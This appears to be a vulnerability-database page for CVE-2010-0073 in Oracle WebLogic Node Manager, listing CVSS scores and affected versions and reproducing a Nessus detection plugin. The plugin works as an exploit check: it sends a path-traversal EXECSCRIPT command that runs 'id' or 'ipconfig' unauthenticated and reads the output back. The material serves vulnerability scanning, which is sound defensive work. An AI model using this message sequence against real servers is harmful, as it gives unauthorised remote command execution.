Vulnerabilities > CVE-2010-0073 - Unspecified vulnerability in Oracle Weblogic Server and Weblogic Server Component

CVSS 10.0 - CRITICAL

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

COMPLETE

Integrity impact

COMPLETE

Availability impact

COMPLETE

network

low complexity

oracle

critical

nessus

NVD

Published: 2010-04-14

Updated: 2018-10-30

Summary

Unspecified vulnerability in the WebLogic Server in Oracle WebLogic Server 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, and 10.3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.

Vulnerable Configurations

Part	Description	Count
Application	Oracle Oracle Weblogic Server * Oracle Weblogic Server 10.3.0.0.0 Oracle Weblogic Server Component * Oracle Weblogic Server Component 6.1 Oracle Weblogic Server Component 7.0 Oracle Weblogic Server Component 8.1 Oracle Weblogic Server Component 9.0 Oracle Weblogic Server Component 9.1 Oracle Weblogic Server Component 9.2 Oracle Weblogic Server Component 10.0 Oracle Weblogic Server Component 10.3	16

Nessus

NASL family	Misc.
NASL id	WEBLOGIC_NODEMANAGER_CMD_EXEC.NASL
description	The version of Node Manager listening on this port allows unauthenticated, remote attackers to execute arbitrary commands with system privileges.
last seen	2020-06-01
modified	2020-06-02
plugin id	44316
published	2010-01-26
reporter	This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/44316
title	Oracle WebLogic Server Node Manager Remote Command Execution
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(44316); script_version("1.18"); script_cve_id("CVE-2010-0073"); script_bugtraq_id(37926); script_name(english:"Oracle WebLogic Server Node Manager Remote Command Execution"); script_summary(english:"Tries to execute a command"); script_set_attribute( attribute:"synopsis", value:"The remote service allows execution of arbitrary code." ); script_set_attribute( attribute:"description", value: "The version of Node Manager listening on this port allows unauthenticated, remote attackers to execute arbitrary commands with system privileges." ); script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?6aee3333" ); script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?a7d02724" ); script_set_attribute( attribute:"solution", value:"Apply the fix referenced in Oracle's advisory." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"vuln_publication_date", value:"2010/01/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/26"); script_cvs_date("Date: 2018/08/06 14:03:15"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("weblogic_nodemanager_detect.nasl", "os_fingerprint.nasl"); script_require_ports("Services/weblogic_nodemanager", 5556); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("data_protection.inc"); port = get_kb_item("Services/weblogic_nodemanager"); if (!port) { if (service_is_unknown(port:5556)) port = 5556; else exit(0, "The host does not appear to be running Node Manager."); } if (!get_port_state(port)) exit(0, "Port "+port+" is not open."); # Initialize some variables. domains = make_list( 'wl_server', 'medrec', 'workshop' ); os = get_kb_item("Host/OS"); if (os) { if ("Windows" >< os) cmd = '/WINDOWS/System32/ipconfig.exe'; else cmd = '/usr/bin/id'; cmds = make_list(cmd); } else { cmds = make_list( '/WINDOWS/System32/ipconfig.exe', '/usr/bin/id' ); } traversal = crap(data:"../", length:39) + '..'; cmd_pats = make_array(); cmd_pats["id"] = "uid=[0-9]+.gid=[0-9]+."; cmd_pats["ipconfig.exe"] = "Subnet Mask"; soc = open_sock_tcp(port); if (!soc) exit(1, "Can't open socket on port "+port+"."); # Send a 'HELLO'. req1 = 'HELLO ' + SCRIPT_NAME; send(socket:soc, data:req1+'\n'); res1 = recv_line(socket:soc, length:1024); if (strlen(res1) == 0) exit(1, "Service on port "+port+" failed to respond."); res1 = chomp(res1); if (res1 !~ "OK Node [Mm]anager") exit(1, "Unexpected response from port "+port+" ("+res1+")."); # Find a valid domain. valid_domain = ""; foreach domain (domains) { req2 = 'DOMAIN ' + domain; send(socket:soc, data:req2+'\n'); res2 = recv_line(socket:soc, length:1024); if (strlen(res2) == 0) exit(1, "Service on port "+port+" failed to respond."); if ('+OK Current domain set to ' >< res2) { valid_domain = domain; break; } } # If we have one... errmsg = ""; report = ""; if (valid_domain) { # Try to exploit the vulnerability. foreach cmd (cmds) { # Add a marker so we can find our command output. marker = 'NESSUS_' + SCRIPT_NAME + '_' + unixtime(); req3 = 'EXECSCRIPT ' + marker; send(socket:soc, data:req3+'\n'); res3 = recv_line(socket:soc, length:1024); if (strlen(res3) == 0) exit(1, "Service on port "+port+" failed to respond."); if ( report_paranoia < 2 && 'Unable to find file "'+marker+'" in the correct service migration' >!< res3 ) { errmsg = "Unexpected response to EXECSCRIPT message from port "+port+" ("+res3+")."; break; } # Now the exploit. # # nb: running an interactive command such as Windows' CALC.exe will likely # result in a timeout as EXECSCRIPT waits for the command to finish. script = traversal + cmd; req3 = 'EXECSCRIPT ' + script; send(socket:soc, data:req3+'\n'); res3 = recv_line(socket:soc, length:1024); if (strlen(res3) == 0) exit(1, "Service on port "+port+" failed to respond."); if ("+OK Script '"+script+"' executed" >< res3) { req4 = 'GETNMLOG'; send(socket:soc, data:req4+'\n'); got_marker = FALSE; info = ""; while (TRUE) { res4 = recv_line(socket:soc, length:1024); if (strlen(res4) == 0) exit(1, "Service on port "+port+" failed to respond."); res4 = chomp(res4); if (res4 == '.') break; if (got_marker && "<Info> <" >< res4) { info += ereg_replace(pattern:"^.+<Info> <(.)>$", replace:"\1", string:res4) + '\n'; } else if ('Unable to find file "'+marker+'" in the correct service migration' >< res4) got_marker = TRUE; } basename = ereg_replace(pattern:"^(.*/)?", replace:"", string:cmd); pat = cmd_pats[basename]; if (os && "Windows" >< os) cmd = str_replace(find:'/', replace:'\\', string:cmd); if (strlen(info) && egrep(pattern:pat, string:info)) { report = '\n' + "Nessus was able to execute the command '" + cmd + "' on the" + '\n' + 'remote host by connecting to this port and sending the following\n' + 'four messages :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + ' ' + req1 + '\n' + ' ' + req2 + '\n' + ' ' + req3 + '\n' + ' ' + req4 + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n'; if (report_verbosity > 1) { report += '\n' + 'This produced the following output :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + info + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n'; } } else { report = '\n' + "Although Nessus did not find the expected output in Node Manager's" + '\n' + "logs, it appears possible based on Node Manager's responses to be" + '\n' + "able to execute the command '" + cmd + "' on the remote" + '\n' + 'host by connecting to this port and sending the following four\n' + 'messages :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + ' ' + req1 + '\n' + ' ' + req2 + '\n' + ' ' + req3 + '\n' + ' ' + req4 + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n'; } } else if ('Unable to find file "'+script+'" in the correct service migration' >< res3) { if (os && "Windows" >< os) cmd = str_replace(find:'/', replace:'\\', string:cmd); report = '\n' + "Although Nessus was not able to execute the command '" + cmd + "'" + '\n' + 'on the remote host, the vulnerability almost certainly exists and\n' + 'is likely exploitable using a different command or path.\n' + '\n' + 'Nessus tried connecting to this port and sending the following three\n' + 'messages :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + ' ' + req1 + '\n' + ' ' + req2 + '\n' + ' ' + req3 + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + '\n' + 'The third message resulted in the following response :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + ' ' + data_protection::sanitize_uid(output:res3) + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n'; } # We're done if we have a report that indicates execution was successful; # if it wasn't successful, we'll try another command. if (report && "Nessus was not able to execute" >!< report) break; } } # Be nice and disconnect cleanly. req = 'QUIT'; send(socket:soc, data:req+'\n'); res = recv_line(socket:soc, length:256); close(soc); # Report results. if (valid_domain) { if (report) { if (report_verbosity > 0) security_hole(port:port, extra:report); else security_hole(port); exit(0); } else if (errmsg) exit(1, errmsg); else exit(0, "The instance of Node Manager listening on port "+port+" is not affected."); } else exit(1, "Failed to find a valid domain for the instance of Node Manager listening on port "+port+".");

Summary

Vulnerable Configurations

Nessus

References